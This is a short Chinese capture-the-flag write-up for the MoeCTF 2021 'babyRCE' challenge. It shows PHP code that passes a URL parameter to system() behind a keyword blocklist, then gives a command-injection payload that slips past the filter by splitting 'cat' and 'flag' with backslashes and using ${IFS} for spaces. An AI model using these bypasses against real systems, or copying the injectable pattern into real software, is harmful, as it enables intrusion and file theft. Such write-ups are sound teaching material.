[MoeCTF 2021]babyRCE

打开题目在线环境可以看到:

php 复制代码
<?php

$rce = $_GET['rce'];
if (isset($rce)) {
    if (!preg_match("/cat|more|less|head|tac|tail|nl|od|vi|vim|sort|flag| |\;|[0-9]|\*|\`|\%|\>|\<|\'|\"/i", $rce)) {
        system($rce);
    }else {
        echo "hhhhhhacker!!!"."\n";
    }
} else {
    highlight_file(__FILE__);
}

这个代码审计起来就比较简单了,这里ls没有过滤可以直接用ls命令查看**?rce=ls**

查看flag.php就能获得flag。 cat过滤 ==> c\at绕过 (可以在linux系统测试,是可以的) 空格过滤 ==>

${IFS}绕过 flag过滤 ==> fl\ag

最后的payload就是:?rce=c\at${IFS}fl\ag.php

相关推荐
twcc_come5 小时前
安全策略配置实验报告
开发语言·php
weixin_BYSJ19876 小时前
springboot3家政平台小程序--附源码00904
java·javascript·spring boot·python·django·flask·php
上海安当技术9 小时前
车间电脑指纹登录怎么做?从 FIDO2 公钥体系到统一身份认证的技术拆解
开发语言·电脑·php
大黄说说1 天前
接口频繁超时、报错?后端常见排查思路总结
开发语言·php
Sagittarius_A*1 天前
【RCELABS】Level 1~4 —— 基础篇
靶场·php·ctf·代码审计·rce
海天鹰1 天前
PHP换行
php
moonsims2 天前
星闪在跨域无人化系统作用
开发语言·php
灯澜忆梦2 天前
GO_网络编程---文件传输实战
网络·golang·php
happy_0x3f2 天前
前端应用的离线暂停更新策略
开发语言·前端·php
wWYy.2 天前
RPC详解
qt·rpc·php